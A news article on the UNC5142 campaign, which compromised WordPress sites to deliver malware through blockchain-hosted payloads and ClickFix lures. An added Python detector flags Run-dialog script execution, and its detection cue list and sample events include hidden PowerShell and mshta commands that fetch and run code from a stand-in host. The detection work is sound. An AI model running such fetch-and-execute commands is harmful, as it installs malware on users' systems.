- UNC5142 hacked 14,000+ WordPress sites to distribute malware
- Malware payloads were sourced from the blockchain, increasing resilience and preventing takedowns
- ClickFix lures tricked users into running malicious commands
More than 14,000 WordPress sites were hacked and used as launching pads for the distribution of malware, Google’s Threat Intelligence Group (GTIG) said in a recent report.
Discussing the campaign in depth, GTIG said it is the work of UNC5142, a relatively new threat actor that emerged in late 2023 and ceased operations in late July 2025.
It is not yet known if the break is temporary, permanent, or if the group has simply switched to different techniques. Given their past success in compromising websites and deploying malware, Google believes the group has just improved its obfuscation techniques and is still operating in the wild.
Blockchain and ClickFix
In the campaign, UNC5142 would “indiscriminately” target vulnerable WordPress sites – those running flawed plugins or theme files and, in some cases, sites whose WordPress database itself could be tampered with.
These sites would be injected with a multi-step JavaScript downloader called CLEARSHORT, which enabled malware distribution. This downloader retrieved the stage two payload from a public blockchain, often the BNB chain.
The use of blockchain is interesting, the researchers found, as it improves resilience and makes takedowns more difficult:
“The use of blockchain technology for large parts of UNC5142’s infrastructure and operations increases their resilience to detection and takedown efforts,” the report states.
“Network-based protection mechanisms are more difficult to implement for Web3 traffic compared to traditional web traffic due to the lack of use of traditional URLs. Seizure and removal operations are also hindered given the immutability of the blockchain.”
Using the data retrieved from the public blockchain, the downloader would then fetch a CLEARSHORT landing page from a remote server. This landing page served ClickFix social engineering tactics – asking users to copy and paste a command into the Run dialog on Windows (or the Terminal app on a Mac), which ultimately downloads the malware.
The landing pages were typically hosted on a Cloudflare .dev site, it said, and downloaded in an encrypted format.
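The Windows half of the ClickFix step described above leaves a recognisable trace on the endpoint: the Run dialog is owned by explorer.exe, so the pasted command shows up as explorer.exe spawning a script host with a download or in-memory execution cue on its command line. The following detection sketch is an added example for this article and is not code from GTIG or from the report; the event field names (Image, ParentImage, CommandLine) mirror Sysmon process-creation events, the script-host and cue lists are starting assumptions to tune per environment, and all sample events are constructed for the example.

```python
"""
Detection sketch for ClickFix-style execution on Windows: flag process-creation
events where explorer.exe (the Run dialog's parent) launches a script host whose
command line carries a download or in-memory execution cue.
Field names follow Sysmon event 1; sample events below are constructed.
"""
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Interpreters and download-capable binaries a pasted ClickFix command typically
# invokes (assumption: a starting list, extend for your environment).
SCRIPT_HOSTS = {
    "powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
    "wscript.exe", "cscript.exe", "curl.exe", "certutil.exe", "bitsadmin.exe",
}

# Lower-cased substrings that indicate fetching or decoding a remote payload.
DOWNLOAD_CUES = (
    "http://", "https://", "downloadstring", "downloadfile",
    "invoke-webrequest", "iwr ", "iex", "invoke-expression",
    "frombase64string", "-encodedcommand", " -enc ", "-w hidden",
    "-windowstyle hidden",
)


@dataclass(frozen=True)
class Finding:
    record_id: int
    reason: str
    command_line: str


def basename(path: str) -> str:
    """Return the file name part of a Windows path, lower-cased."""
    return path.rsplit("\\", 1)[-1].lower()


def detect_clickfix_run(event: dict) -> Optional[Finding]:
    """Return a Finding when the event matches the explorer.exe -> script host
    -> download-cue chain, otherwise None."""
    parent = basename(event.get("ParentImage", ""))
    image = basename(event.get("Image", ""))
    if parent != "explorer.exe" or image not in SCRIPT_HOSTS:
        return None
    cmd = event.get("CommandLine", "")
    cues = [c for c in DOWNLOAD_CUES if c in cmd.lower()]
    if not cues:
        return None
    reason = "explorer.exe -> %s with download cue(s): %s" % (image, ", ".join(cues))
    return Finding(event["RecordId"], reason, cmd)


def scan(events: Iterable[dict]) -> List[Finding]:
    """Run the detector over a stream of process-creation events."""
    return [f for e in events if (f := detect_clickfix_run(e)) is not None]


# Constructed sample events (not real telemetry). example.invalid is a reserved name.
SAMPLE_EVENTS = [
    {"RecordId": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -w hidden -c "iex (iwr -UseBasicParsing https://example.invalid/run.txt)"'},
    {"RecordId": 2, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt"},
    {"RecordId": 3, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -c Invoke-WebRequest https://example.invalid/build.zip"},
    {"RecordId": 4, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -c Get-Date"},
    {"RecordId": 5, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe https://example.invalid/verify"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding.record_id, finding.reason, "|", finding.command_line)
```

Event 3 is deliberately left unflagged: a download launched from cmd.exe is common in build and admin scripts, and the explorer.exe parent is what ties the event to the Run dialog. In practice the parent check should be widened to the browser and terminal processes used in a given environment (the Mac variant keys on Terminal rather than explorer.exe), and the cue list tuned against baseline telemetry to keep false positives down.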
Via Hacker News